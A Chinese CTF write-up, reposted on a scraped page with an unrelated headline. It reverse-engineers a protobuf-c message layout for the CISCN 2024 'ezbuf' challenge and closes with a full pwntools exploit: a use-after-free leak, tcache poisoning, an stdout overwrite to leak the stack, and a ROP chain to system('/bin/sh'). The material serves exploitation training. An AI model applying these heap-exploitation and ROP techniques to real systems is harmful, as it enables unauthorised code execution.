当前位置：首页 > news >正文

ui做交互式网站吗注册城乡规划师有什么用

news 2025/12/3 15:16:08

ui做交互式网站吗,注册城乡规划师有什么用,寻亲网站开发设计文档,电商平台有哪些模式文章目录参考protobuf逆向学习复原结构思路exp 参考 https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf protobuf 当时压根不知道用了protobuf这个玩意#xff0c;提取工具也没提取出来#xff0c;还是做题做太少了#xff0c;很多关键性的结构都没看出来是pro… 文章目录参考protobuf逆向学习复原结构思路exp 参考 https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf protobuf 当时压根不知道用了protobuf这个玩意提取工具也没提取出来还是做题做太少了很多关键性的结构都没看出来是protobuf 下次可以根据ProtobufCMessageDescriptor结构体的magic头一般是0x28AAEEF9来搜索定位到ProtobufCMessageDescriptor 逆向学习 const ProtobufCMessageDescriptor devicemsg__descriptor {PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,devicemsg,Devicemsg,Devicemsg,,sizeof(Devicemsg),5,devicemsg__field_descriptors,devicemsg__field_indices_by_name,1, devicemsg__number_ranges,(ProtobufCMessageInit) devicemsg__init,NULL,NULL,NULL /* reserved[123] */ };相关字段 /*** Describes a message.*/ struct ProtobufCMessageDescriptor {/** Magic value checked to ensure that the API is used correctly. */uint32_t magic;/** The qualified name (e.g., namespace.Type). */const char *name;/** The unqualified name as given in the .proto file (e.g., Type). */const char *short_name;/** Identifier used in generated C code. */const char *c_name;/** The dot-separated namespace. */const char *package_name;/*** Size in bytes of the C structure representing an instance of this* type of message.*/size_t sizeof_message;/** Number of elements in fields. */unsigned n_fields;/** Field descriptors, sorted by tag number. */const ProtobufCFieldDescriptor *fields;/** Used for looking up fields by name. */const unsigned *fields_sorted_by_name;/** Number of elements in field_ranges. */unsigned n_field_ranges;/** Used for looking up fields by id. */const ProtobufCIntRange *field_ranges;/** Message initialisation function. */ProtobufCMessageInit message_init;/** Reserved for future use. */void *reserved1;/** Reserved for future use. */void *reserved2;/** Reserved for future use. */void *reserved3; }; 对应IDA中 .data.rel.ro:000000000000BC60 unk_BC60 db 0F9h ; DATA XREF: sub_1AFE5B↑o .data.rel.ro:000000000000BC60 ; sub_1B6617↑o ... .data.rel.ro:000000000000BC61 db 0EEh .data.rel.ro:000000000000BC62 db 0AAh .data.rel.ro:000000000000BC63 db 28h ; ( .data.rel.ro:000000000000BC64 db 0 .data.rel.ro:000000000000BC65 db 0 .data.rel.ro:000000000000BC66 db 0 .data.rel.ro:000000000000BC67 db 0 .data.rel.ro:000000000000BC68 dq offset aHeybro ; heybro .data.rel.ro:000000000000BC70 dq offset aHeybro_0 ; Heybro .data.rel.ro:000000000000BC78 dq offset aHeybro_0 ; Heybro .data.rel.ro:000000000000BC80 dq offset unk_910E .data.rel.ro:000000000000BC88 db 48h ; H .data.rel.ro:000000000000BC89 db 0 .data.rel.ro:000000000000BC8A db 0 .data.rel.ro:000000000000BC8B db 0 .data.rel.ro:000000000000BC8C db 0 .data.rel.ro:000000000000BC8D db 0 .data.rel.ro:000000000000BC8E db 0 .data.rel.ro:000000000000BC8F db 0 .data.rel.ro:000000000000BC90 db 5 .data.rel.ro:000000000000BC91 db 0 .data.rel.ro:000000000000BC92 db 0 .data.rel.ro:000000000000BC93 db 0 .data.rel.ro:000000000000BC94 db 0 .data.rel.ro:000000000000BC95 db 0 .data.rel.ro:000000000000BC96 db 0 .data.rel.ro:000000000000BC97 db 0 .data.rel.ro:000000000000BC98 dq offset off_BAE0 ; whatcon .data.rel.ro:000000000000BCA0 dq offset unk_90D0 .data.rel.ro:000000000000BCA8 db 1 .data.rel.ro:000000000000BCA9 db 0 .data.rel.ro:000000000000BCAA db 0 .data.rel.ro:000000000000BCAB db 0 .data.rel.ro:000000000000BCAC db 0 .data.rel.ro:000000000000BCAD db 0 .data.rel.ro:000000000000BCAE db 0 .data.rel.ro:000000000000BCAF db 0 .data.rel.ro:000000000000BCB0 dq offset unk_90F0 .data.rel.ro:000000000000BCB8 dq offset sub_1AFE然后根据ProtobufCFieldDescriptor去寻找内部各个字段的内容 static const ProtobufCFieldDescriptor devicemsg__field_descriptors[5] {{whatcon,1,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_BYTES,0, /* quantifier_offset */offsetof(Devicemsg, whatcon),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{whattodo,2,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whattodo),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{whatidx,3,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whatidx),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{whatsize,4,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_SINT64,0, /* quantifier_offset */offsetof(Devicemsg, whatsize),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */},{protobuf_c_message_packwhatsthis,5,PROTOBUF_C_LABEL_NONE,PROTOBUF_C_TYPE_UINT32,0, /* quantifier_offset */offsetof(Devicemsg, whatsthis),NULL,NULL,0, /* flags */0,NULL,NULL /* reserved1,reserved2, etc */}, };相关字段的定义 struct ProtobufCFieldDescriptor {/** Name of the field as given in the .proto file. */const char *name;/** Tag value of the field as given in the .proto file. */uint32_t id;/** Whether the field is REQUIRED, OPTIONAL, or REPEATED. */ProtobufCLabel label;/** The type of the field. */ProtobufCType type;/*** The offset in bytes of the messages C structures quantifier field* (the has_MEMBER field for optional members or the n_MEMBER field* for repeated members or the case enum for oneofs).*/unsigned quantifier_offset;/*** The offset in bytes into the messages C structure for the member* itself.*/unsigned offset;/*** A type-specific descriptor.** If type is PROTOBUF_C_TYPE_ENUM, then descriptor points to the* corresponding ProtobufCEnumDescriptor.** If type is PROTOBUF_C_TYPE_MESSAGE, then descriptor points to* the corresponding ProtobufCMessageDescriptor.** Otherwise this field is NULL.*/const void *descriptor; /* for MESSAGE and ENUM types *//** The default value for this field, if defined. May be NULL. */const void *default_value;/*** A flag word. Zero or more of the bits defined in the* ProtobufCFieldFlag enum may be set.*/uint32_t flags;/** Reserved for future use. */unsigned reserved_flags;/** Reserved for future use. */void *reserved2;/** Reserved for future use. */void *reserved3; }; 根据这四个字段来复原原来的结构const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type; typedef enum {/** A well-formed message must have exactly one of this field. */0 PROTOBUF_C_LABEL_REQUIRED,/*** A well-formed message can have zero or one of this field (but not* more than one).*/1 PROTOBUF_C_LABEL_OPTIONAL,/*** This field can be repeated any number of times (including zero) in a* well-formed message. The order of the repeated values will be* preserved.*/2 PROTOBUF_C_LABEL_REPEATED,/*** This field has no label. This is valid only in proto3 and is* equivalent to OPTIONAL but no has quantifier will be consulted.*/3 PROTOBUF_C_LABEL_NONE, } ProtobufCLabel;typedef enum { 0 PROTOBUF_C_TYPE_INT32, /** int32 */ 1 PROTOBUF_C_TYPE_SINT32, /** signed int32 */ 2 PROTOBUF_C_TYPE_SFIXED32, /** signed int32 (4 bytes) */ 3 PROTOBUF_C_TYPE_INT64, /** int64 */ 4 PROTOBUF_C_TYPE_SINT64, /** signed int64 */ 5 PROTOBUF_C_TYPE_SFIXED64, /** signed int64 (8 bytes) */ 6 PROTOBUF_C_TYPE_UINT32, /** unsigned int32 */ 7 PROTOBUF_C_TYPE_FIXED32, /** unsigned int32 (4 bytes) */ 8 PROTOBUF_C_TYPE_UINT64, /** unsigned int64 */ 9 PROTOBUF_C_TYPE_FIXED64, /** unsigned int64 (8 bytes) */ 10 PROTOBUF_C_TYPE_FLOAT, /** float */ 11 PROTOBUF_C_TYPE_DOUBLE, /** double */ 12 PROTOBUF_C_TYPE_BOOL, /** boolean */ 13 PROTOBUF_C_TYPE_ENUM, /** enumerated type */ 14 PROTOBUF_C_TYPE_STRING, /** UTF-8 or ASCII string */ 15 PROTOBUF_C_TYPE_BYTES, /** arbitrary byte sequence */ 16 PROTOBUF_C_TYPE_MESSAGE, /** nested message */ } ProtobufCType; 对应到IDA中 .data.rel.ro:000000000000BAE0 off_BAE0 dq offset aWhatcon ; DATA XREF: .data.rel.ro:000000000000BC98↓o .data.rel.ro:000000000000BAE0 ; whatcon .data.rel.ro:000000000000BAE8 db 1 .data.rel.ro:000000000000BAE9 db 0 .data.rel.ro:000000000000BAEA db 0 .data.rel.ro:000000000000BAEB db 0 .data.rel.ro:000000000000BAEC db 3 .data.rel.ro:000000000000BAED db 0 .data.rel.ro:000000000000BAEE db 0 .data.rel.ro:000000000000BAEF db 0 .data.rel.ro:000000000000BAF0 db 0Fh .data.rel.ro:000000000000BAF1 db 0 .data.rel.ro:000000000000BAF2 db 0 .data.rel.ro:000000000000BAF3 db 0 .data.rel.ro:000000000000BAF4 db 0 .data.rel.ro:000000000000BAF5 db 0 .data.rel.ro:000000000000BAF6 db 0 .data.rel.ro:000000000000BAF7 db 0 .data.rel.ro:000000000000BAF8 db 18h .data.rel.ro:000000000000BAF9 db 0 .data.rel.ro:000000000000BAFA db 0 .data.rel.ro:000000000000BAFB db 0 .data.rel.ro:000000000000BAFC db 0 .data.rel.ro:000000000000BAFD db 0 .data.rel.ro:000000000000BAFE db 0 .data.rel.ro:000000000000BAFF db 0 .data.rel.ro:000000000000BB00 db 0 .data.rel.ro:000000000000BB01 db 0 .data.rel.ro:000000000000BB02 db 0 .data.rel.ro:000000000000BB03 db 0 .data.rel.ro:000000000000BB04 db 0 .data.rel.ro:000000000000BB05 db 0 .data.rel.ro:000000000000BB06 db 0 .data.rel.ro:000000000000BB07 db 0 .data.rel.ro:000000000000BB08 db 0 .data.rel.ro:000000000000BB09 db 0 .data.rel.ro:000000000000BB0A db 0 .data.rel.ro:000000000000BB0B db 0 .data.rel.ro:000000000000BB0C db 0 .data.rel.ro:000000000000BB0D db 0 .data.rel.ro:000000000000BB0E db 0 .data.rel.ro:000000000000BB0F db 0 .data.rel.ro:000000000000BB10 db 0 .data.rel.ro:000000000000BB11 db 0 .data.rel.ro:000000000000BB12 db 0 .data.rel.ro:000000000000BB13 db 0 .data.rel.ro:000000000000BB14 db 0 .data.rel.ro:000000000000BB15 db 0 .data.rel.ro:000000000000BB16 db 0 .data.rel.ro:000000000000BB17 db 0 .data.rel.ro:000000000000BB18 db 0 .data.rel.ro:000000000000BB19 db 0 .data.rel.ro:000000000000BB1A db 0 .data.rel.ro:000000000000BB1B db 0 .data.rel.ro:000000000000BB1C db 0 .data.rel.ro:000000000000BB1D db 0 .data.rel.ro:000000000000BB1E db 0 .data.rel.ro:000000000000BB1F db 0 .data.rel.ro:000000000000BB20 db 0 .data.rel.ro:000000000000BB21 db 0 .data.rel.ro:000000000000BB22 db 0 .data.rel.ro:000000000000BB23 db 0 .data.rel.ro:000000000000BB24 db 0 .data.rel.ro:000000000000BB25 db 0 .data.rel.ro:000000000000BB26 db 0 .data.rel.ro:000000000000BB27 db 0 .data.rel.ro:000000000000BB28 dq offset aWhattodo ; whattodo .data.rel.ro:000000000000BB30 db 2 .data.rel.ro:000000000000BB31 db 0 .data.rel.ro:000000000000BB32 db 0 .data.rel.ro:000000000000BB33 db 0 .data.rel.ro:000000000000BB34 db 3 .data.rel.ro:000000000000BB35 db 0 .data.rel.ro:000000000000BB36 db 0 .data.rel.ro:000000000000BB37 db 0 .data.rel.ro:000000000000BB38 db 4 .data.rel.ro:000000000000BB39 db 0 .data.rel.ro:000000000000BB3A db 0 .data.rel.ro:000000000000BB3B db 0 .data.rel.ro:000000000000BB3C db 0 .data.rel.ro:000000000000BB3D db 0 .data.rel.ro:000000000000BB3E db 0 .data.rel.ro:000000000000BB3F db 0 .data.rel.ro:000000000000BB40 db 28h ; ( .data.rel.ro:000000000000BB41 db 0 .data.rel.ro:000000000000BB42 db 0 .data.rel.ro:000000000000BB43 db 0 .data.rel.ro:000000000000BB44 db 0 .data.rel.ro:000000000000BB45 db 0 .data.rel.ro:000000000000BB46 db 0 .data.rel.ro:000000000000BB47 db 0 .data.rel.ro:000000000000BB48 db 0 .data.rel.ro:000000000000BB49 db 0 .data.rel.ro:000000000000BB4A db 0 .data.rel.ro:000000000000BB4B db 0 .data.rel.ro:000000000000BB4C db 0 .data.rel.ro:000000000000BB4D db 0 .data.rel.ro:000000000000BB4E db 0 .data.rel.ro:000000000000BB4F db 0 .data.rel.ro:000000000000BB50 db 0 .data.rel.ro:000000000000BB51 db 0 .data.rel.ro:000000000000BB52 db 0 .data.rel.ro:000000000000BB53 db 0 .data.rel.ro:000000000000BB54 db 0 .data.rel.ro:000000000000BB55 db 0 .data.rel.ro:000000000000BB56 db 0 .data.rel.ro:000000000000BB57 db 0 .data.rel.ro:000000000000BB58 db 0 .data.rel.ro:000000000000BB59 db 0 .data.rel.ro:000000000000BB5A db 0 .data.rel.ro:000000000000BB5B db 0 .data.rel.ro:000000000000BB5C db 0 .data.rel.ro:000000000000BB5D db 0 .data.rel.ro:000000000000BB5E db 0 .data.rel.ro:000000000000BB5F db 0 .data.rel.ro:000000000000BB60 db 0 .data.rel.ro:000000000000BB61 db 0 .data.rel.ro:000000000000BB62 db 0 .data.rel.ro:000000000000BB63 db 0 .data.rel.ro:000000000000BB64 db 0 .data.rel.ro:000000000000BB65 db 0 .data.rel.ro:000000000000BB66 db 0 .data.rel.ro:000000000000BB67 db 0 .data.rel.ro:000000000000BB68 db 0 .data.rel.ro:000000000000BB69 db 0 .data.rel.ro:000000000000BB6A db 0 .data.rel.ro:000000000000BB6B db 0 .data.rel.ro:000000000000BB6C db 0 .data.rel.ro:000000000000BB6D db 0 .data.rel.ro:000000000000BB6E db 0 .data.rel.ro:000000000000BB6F db 0 .data.rel.ro:000000000000BB70 dq offset aWhatidx ; whatidx .data.rel.ro:000000000000BB78 db 3 .data.rel.ro:000000000000BB79 db 0 .data.rel.ro:000000000000BB7A db 0 .data.rel.ro:000000000000BB7B db 0 .data.rel.ro:000000000000BB7C db 3 .data.rel.ro:000000000000BB7D db 0 .data.rel.ro:000000000000BB7E db 0 .data.rel.ro:000000000000BB7F db 0 .data.rel.ro:000000000000BB80 db 4 .data.rel.ro:000000000000BB81 db 0 .data.rel.ro:000000000000BB82 db 0 .data.rel.ro:000000000000BB83 db 0 .data.rel.ro:000000000000BB84 db 0 .data.rel.ro:000000000000BB85 db 0 .data.rel.ro:000000000000BB86 db 0 .data.rel.ro:000000000000BB87 db 0 .data.rel.ro:000000000000BB88 db 30h ; 0 .data.rel.ro:000000000000BB89 db 0 .data.rel.ro:000000000000BB8A db 0 .data.rel.ro:000000000000BB8B db 0 .data.rel.ro:000000000000BB8C db 0 .data.rel.ro:000000000000BB8D db 0 .data.rel.ro:000000000000BB8E db 0 .data.rel.ro:000000000000BB8F db 0 .data.rel.ro:000000000000BB90 db 0 .data.rel.ro:000000000000BB91 db 0 .data.rel.ro:000000000000BB92 db 0 .data.rel.ro:000000000000BB93 db 0 .data.rel.ro:000000000000BB94 db 0 .data.rel.ro:000000000000BB95 db 0 .data.rel.ro:000000000000BB96 db 0 .data.rel.ro:000000000000BB97 db 0 .data.rel.ro:000000000000BB98 db 0 .data.rel.ro:000000000000BB99 db 0 .data.rel.ro:000000000000BB9A db 0 .data.rel.ro:000000000000BB9B db 0 .data.rel.ro:000000000000BB9C db 0 .data.rel.ro:000000000000BB9D db 0 .data.rel.ro:000000000000BB9E db 0 .data.rel.ro:000000000000BB9F db 0 .data.rel.ro:000000000000BBA0 db 0 .data.rel.ro:000000000000BBA1 db 0 .data.rel.ro:000000000000BBA2 db 0 .data.rel.ro:000000000000BBA3 db 0 .data.rel.ro:000000000000BBA4 db 0 .data.rel.ro:000000000000BBA5 db 0 .data.rel.ro:000000000000BBA6 db 0 .data.rel.ro:000000000000BBA7 db 0 .data.rel.ro:000000000000BBA8 db 0 .data.rel.ro:000000000000BBA9 db 0 .data.rel.ro:000000000000BBAA db 0 .data.rel.ro:000000000000BBAB db 0 .data.rel.ro:000000000000BBAC db 0 .data.rel.ro:000000000000BBAD db 0 .data.rel.ro:000000000000BBAE db 0 .data.rel.ro:000000000000BBAF db 0 .data.rel.ro:000000000000BBB0 db 0 .data.rel.ro:000000000000BBB1 db 0 .data.rel.ro:000000000000BBB2 db 0 .data.rel.ro:000000000000BBB3 db 0 .data.rel.ro:000000000000BBB4 db 0 .data.rel.ro:000000000000BBB5 db 0 .data.rel.ro:000000000000BBB6 db 0 .data.rel.ro:000000000000BBB7 db 0 .data.rel.ro:000000000000BBB8 dq offset aWhatsize ; whatsize .data.rel.ro:000000000000BBC0 db 4 .data.rel.ro:000000000000BBC1 db 0 .data.rel.ro:000000000000BBC2 db 0 .data.rel.ro:000000000000BBC3 db 0 .data.rel.ro:000000000000BBC4 db 3 .data.rel.ro:000000000000BBC5 db 0 .data.rel.ro:000000000000BBC6 db 0 .data.rel.ro:000000000000BBC7 db 0 .data.rel.ro:000000000000BBC8 db 4 .data.rel.ro:000000000000BBC9 db 0 .data.rel.ro:000000000000BBCA db 0 .data.rel.ro:000000000000BBCB db 0 .data.rel.ro:000000000000BBCC db 0 .data.rel.ro:000000000000BBCD db 0 .data.rel.ro:000000000000BBCE db 0 .data.rel.ro:000000000000BBCF db 0 .data.rel.ro:000000000000BBD0 db 38h ; 8 .data.rel.ro:000000000000BBD1 db 0 .data.rel.ro:000000000000BBD2 db 0 .data.rel.ro:000000000000BBD3 db 0 .data.rel.ro:000000000000BBD4 db 0 .data.rel.ro:000000000000BBD5 db 0 .data.rel.ro:000000000000BBD6 db 0 .data.rel.ro:000000000000BBD7 db 0 .data.rel.ro:000000000000BBD8 db 0 .data.rel.ro:000000000000BBD9 db 0 .data.rel.ro:000000000000BBDA db 0 .data.rel.ro:000000000000BBDB db 0 .data.rel.ro:000000000000BBDC db 0 .data.rel.ro:000000000000BBDD db 0 .data.rel.ro:000000000000BBDE db 0 .data.rel.ro:000000000000BBDF db 0 .data.rel.ro:000000000000BBE0 db 0 .data.rel.ro:000000000000BBE1 db 0 .data.rel.ro:000000000000BBE2 db 0 .data.rel.ro:000000000000BBE3 db 0 .data.rel.ro:000000000000BBE4 db 0 .data.rel.ro:000000000000BBE5 db 0 .data.rel.ro:000000000000BBE6 db 0 .data.rel.ro:000000000000BBE7 db 0 .data.rel.ro:000000000000BBE8 db 0 .data.rel.ro:000000000000BBE9 db 0 .data.rel.ro:000000000000BBEA db 0 .data.rel.ro:000000000000BBEB db 0 .data.rel.ro:000000000000BBEC db 0 .data.rel.ro:000000000000BBED db 0 .data.rel.ro:000000000000BBEE db 0 .data.rel.ro:000000000000BBEF db 0 .data.rel.ro:000000000000BBF0 db 0 .data.rel.ro:000000000000BBF1 db 0 .data.rel.ro:000000000000BBF2 db 0 .data.rel.ro:000000000000BBF3 db 0 .data.rel.ro:000000000000BBF4 db 0 .data.rel.ro:000000000000BBF5 db 0 .data.rel.ro:000000000000BBF6 db 0 .data.rel.ro:000000000000BBF7 db 0 .data.rel.ro:000000000000BBF8 db 0 .data.rel.ro:000000000000BBF9 db 0 .data.rel.ro:000000000000BBFA db 0 .data.rel.ro:000000000000BBFB db 0 .data.rel.ro:000000000000BBFC db 0 .data.rel.ro:000000000000BBFD db 0 .data.rel.ro:000000000000BBFE db 0 .data.rel.ro:000000000000BBFF db 0 .data.rel.ro:000000000000BC00 dq offset aWhatsthis ; whatsthis .data.rel.ro:000000000000BC08 db 5 .data.rel.ro:000000000000BC09 db 0 .data.rel.ro:000000000000BC0A db 0 .data.rel.ro:000000000000BC0B db 0 .data.rel.ro:000000000000BC0C db 3 .data.rel.ro:000000000000BC0D db 0 .data.rel.ro:000000000000BC0E db 0 .data.rel.ro:000000000000BC0F db 0 .data.rel.ro:000000000000BC10 db 6 .data.rel.ro:000000000000BC11 db 0 .data.rel.ro:000000000000BC12 db 0 .data.rel.ro:000000000000BC13 db 0 .data.rel.ro:000000000000BC14 db 0 .data.rel.ro:000000000000BC15 db 0 .data.rel.ro:000000000000BC16 db 0 .data.rel.ro:000000000000BC17 db 0 .data.rel.ro:000000000000BC18 db 40h ; .data.rel.ro:000000000000BC19 db 0 .data.rel.ro:000000000000BC1A db 0 .data.rel.ro:000000000000BC1B db 0 .data.rel.ro:000000000000BC1C db 0 .data.rel.ro:000000000000BC1D db 0 .data.rel.ro:000000000000BC1E db 0 .data.rel.ro:000000000000BC1F db 0 .data.rel.ro:000000000000BC20 db 0 .data.rel.ro:000000000000BC21 db 0 .data.rel.ro:000000000000BC22 db 0 .data.rel.ro:000000000000BC23 db 0 .data.rel.ro:000000000000BC24 db 0 .data.rel.ro:000000000000BC25 db 0 .data.rel.ro:000000000000BC26 db 0 .data.rel.ro:000000000000BC27 db 0 .data.rel.ro:000000000000BC28 db 0 .data.rel.ro:000000000000BC29 db 0 .data.rel.ro:000000000000BC2A db 0 .data.rel.ro:000000000000BC2B db 0 .data.rel.ro:000000000000BC2C db 0 .data.rel.ro:000000000000BC2D db 0 .data.rel.ro:000000000000BC2E db 0 .data.rel.ro:000000000000BC2F db 0 .data.rel.ro:000000000000BC30 db 0 .data.rel.ro:000000000000BC31 db 0 .data.rel.ro:000000000000BC32 db 0 .data.rel.ro:000000000000BC33 db 0 .data.rel.ro:000000000000BC34 db 0 .data.rel.ro:000000000000BC35 db 0 .data.rel.ro:000000000000BC36 db 0 .data.rel.ro:000000000000BC37 db 0 .data.rel.ro:000000000000BC38 db 0 .data.rel.ro:000000000000BC39 db 0 .data.rel.ro:000000000000BC3A db 0 .data.rel.ro:000000000000BC3B db 0 .data.rel.ro:000000000000BC3C db 0 .data.rel.ro:000000000000BC3D db 0 .data.rel.ro:000000000000BC3E db 0 .data.rel.ro:000000000000BC3F db 0 .data.rel.ro:000000000000BC40 db 0 .data.rel.ro:000000000000BC41 db 0 .data.rel.ro:000000000000BC42 db 0 .data.rel.ro:000000000000BC43 db 0 .data.rel.ro:000000000000BC44 db 0 .data.rel.ro:000000000000BC45 db 0 .data.rel.ro:000000000000BC46 db 0 .data.rel.ro:000000000000BC47 db 0 .data.rel.ro:000000000000BC48 db 0 .data.rel.ro:000000000000BC49 db 0 .data.rel.ro:000000000000BC4A db 0 .data.rel.ro:000000000000BC4B db 0 .data.rel.ro:000000000000BC4C db 0 .data.rel.ro:000000000000BC4D db 0 .data.rel.ro:000000000000BC4E db 0 .data.rel.ro:000000000000BC4F db 0 .data.rel.ro:000000000000BC50 db 0 .data.rel.ro:000000000000BC51 db 0 .data.rel.ro:000000000000BC52 db 0 .data.rel.ro:000000000000BC53 db 0 .data.rel.ro:000000000000BC54 db 0 .data.rel.ro:000000000000BC55 db 0 .data.rel.ro:000000000000BC56 db 0 .data.rel.ro:000000000000BC57 db 0 .data.rel.ro:000000000000BC58 db 0 .data.rel.ro:000000000000BC59 db 0 .data.rel.ro:000000000000BC5A db 0 .data.rel.ro:000000000000BC5B db 0 .data.rel.ro:000000000000BC5C db 0 .data.rel.ro:000000000000BC5D db 0 .data.rel.ro:000000000000BC5E db 0 .data.rel.ro:000000000000BC5F db 0复原结构根据ProtobufCMessageDescriptor 的name字段得到这个message的名字为heybro然后根据ProtobufCFieldDescriptor 的const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type;得到各个内容的名字idlabel和类型 message heybro{bytes whatcon 1;sint64 whattodo 2;sint64 whatidx 3;sint64 whatsize 4;uint32 whatsthis 5; }struct Heybro {ProtobufCMessage base; //24个字节ProtobufCBinaryData whatcon;int64_t whattodo;int64_t whatidx;int64_t whatsize;uint32_t whatsthis; };struct ProtobufCMessage {/** The descriptor for this message type. */const ProtobufCMessageDescriptor *descriptor;/** The number of elements in unknown_fields. */unsigned n_unknown_fields;/** The fields that werent recognized by the parser. */ProtobufCMessageUnknownField *unknown_fields; };struct ProtobufCBinaryData {size_t len; /** Number of bytes in the data field. */uint8_t *data; /** Data bytes. */ };sub_1934(*(_QWORD *)(heybro 24),*(_QWORD *)(heybro 32),*(_QWORD *)(heybro 40),*(_QWORD *)(heybro 48),*(_QWORD *)(heybro 56),*(unsigned int *)(heybro 64));bytes类型转化为c语言结构时会变成一个结构体里面存放长度和内容指针。IDA由于没有内置相关结构信息将其当做八字节数组进行解析因此会产生一个有6个记录的错觉实际上后两个参数是同一个记录内置的两条记录。思路 add会检查索引然后根据索引分配会固定得到0x40大小的chunk并且会把whatcon的内容赋值过去10次delete会检查索引范围和对应索引的chunk是否为空但free后没有清零3次show。会在会检查索引范围和对应索引的chunk是否为空并且在whatsthis \xFF’和 whatsize 48都不满足会打印出chunk的内容存在doublefreeshow after free add时候会先分配一个0x50和一个和data长度相同的chunk这两个都是从unsortedbin中分的然后先是将内容写到那个和data长度相同的chunk 最后memcpy将datachunk写到分配得到的0x40的chunk这里的话可以通过残留的libc泄露地址泄露堆地址直接由于mempy特性和必须写入内容特性残留堆地址会被修改所以没用通过free到tcache泄露即可构造任意写但由于delete的限制次数刚好是10次所以只有一次任意写但此时tcache中存在其他bin有很多个可以通过写tcachebin然后实现多次任意写,泄露stack地址可以通过任意写stdout后泄露栈地址 IO_2_1_stdout_flags 0xFBAD1800然后让后面的三个read参数为0,然后就write_base和write_ptr之间为我们要输出的地址范围 malloc分配到tcachebin然后再修改tcachebin使得可以分配到栈上 exp from pwn import * import devicemsg_pb2 #context.log_leveldebug context.archamd64 context.oslinuxdef add(idx,con):brodevicemsg_pb2.heybro()bro.whatconconbro.whattodo1bro.whatidxidxp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def delete(idx):brodevicemsg_pb2.heybro()bro.whattodo2bro.whatidxidxp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def magic(idx,thiss,size,con):brodevicemsg_pb2.heybro()bro.whattodo3bro.whatidxidxbro.whatsthisthissbro.whatsizesizebro.whatconconp.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())def exitt():brodevicemsg_pb2.heybro()bro.whattodo4p.sendafter(bWHAT DO YOU WANT?\n,bro.SerializeToString())#premote(8.147.129.121,15268) pprocess(./pwn) libcELF(./libc.so.6)add(0,ba)add(1,ba)magic(0,0,0,b) p.recvuntil(bContent:) libcbaseu64(p.recvuntil(b\x7f).ljust(8,b\x00))-0x21ac61 print(hex(libcbase))for i in range(9):add(i,ba)for i in range(8):delete(i)magic(0,0,0,b) p.recvuntil(bContent:) heapu64(p.recvline()[:-1].ljust(8,b\x00))1 print(hex(heap))delete(8)delete(7)for i in range(7):add(i,ba)pause()add(7,p64(((heap12)-0x50000xe0)^heap)) add(7,ba) add(7,ba) add(7,b\x00*8p64(libcbase0x21b780-0x90)p64(0)p64(((heap12)-0x50000xe0))) payloadb\x00*0x90p64(0xfbad1887)p64(0)*3p64(libcbase0x222200)p64(libcbase0x222208) #写stderr add(7,payload) stacku64(p.recvuntil(b\x7f).ljust(8,b\x00)) add(7,p64(0)p64(stack-0x168)b\x00*0xd0)# 再次修改tcachebin #gdb.attach(p)rdilibcbase0x2a3e5 bin_shlibcbasenext(libc.search(b/bin/sh\x00)) systemlibcbaselibc.symbols[system] retlibcbase0x29139 ropba*8p64(ret)p64(rdi)p64(bin_sh)p64(system) add(7,rop.ljust(0xc0,b\x00)) p.interactive()

查看全文

http://www.dnsts.com.cn/news/11597.html